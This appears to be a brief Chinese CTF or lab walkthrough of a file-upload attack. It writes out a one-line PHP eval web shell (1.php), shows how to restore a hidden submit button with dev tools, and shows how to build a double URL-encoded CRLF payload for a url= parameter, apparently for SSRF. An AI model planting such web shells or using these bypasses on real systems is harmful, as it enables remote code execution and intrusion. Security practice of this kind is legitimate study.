打开网址
新建一个文档,在其中写下面的内容,将名字该为1.php
<?php @eval($_POSTcmd);?>
将1.php提交上去,发现没反应
按f12查看后发现没有提交的代码,右键编辑,自己写一个
<input type="submit" name="submit">
编辑代码后结果如下
将1.php提交查询抓包
修改一下
进行url编码
在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A
再次url编码
将结果放到url=后面
将前两个%253A换成:
